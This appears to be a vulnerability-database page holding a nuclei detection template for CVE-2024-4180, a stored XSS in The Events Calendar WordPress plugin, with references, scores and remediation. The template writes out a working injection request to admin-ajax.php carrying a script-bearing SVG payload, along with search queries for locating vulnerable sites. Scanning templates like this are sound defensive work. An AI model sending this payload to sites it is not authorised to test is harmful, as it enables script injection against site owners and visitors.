Lucene search
K

The Events Calendar < 6.4.0.1 - Cross-site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Stored cross-site scripting in The Events Calendar before 6.4.0.1 via AJAX; update to 6.4.0.1.

Related
Refs
Code
id: CVE-2024-4180

info:
  name: The Events Calendar < 6.4.0.1 - Cross-site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    The Events Calendar WordPress plugin < 6.4.0.1 contains a stored XSS caused by improper sanitization of user-submitted content when rendering views via AJAX, letting attackers execute scripts in the context of the affected site. Exploitation requires user interaction.
  impact: |
    Attackers can execute arbitrary scripts in the context of the affected site, leading to potential session hijacking or defacement.
  remediation: |
    Update to version 6.4.0.1 or later.
  reference:
    - https://wpscan.com/vulnerability/b2a92316-e404-4a5e-8426-f88df6e87550/
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4180
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-4180
    cwe-id: CWE-79
    epss-score: 0.01834
    epss-percentile: 0.76334
    cpe: cpe:2.3:a:stellarwp:the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: stellarwp
    product: the_events_calendar
    framework: wordpress
    fofa-query: body="wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,the-events-calendar,xss

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tribe_events_views_v2_fallback&view=reflector&view_data[lala]='<svg alert(document.domain)>'

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, '<svg alert(document.domain)>', 'event_display_mode')
          - contains(content_type, 'text/html')
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100bc98446863ab10a8494c70f798df7337556d03dcb1248f66771e16e9eecd5d9a0221008f0dd9f0b9a0f6bc3acc8529878f46862d97b1b1bc9f5a83ac577430b2bfd1b7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.01834
SSVC
20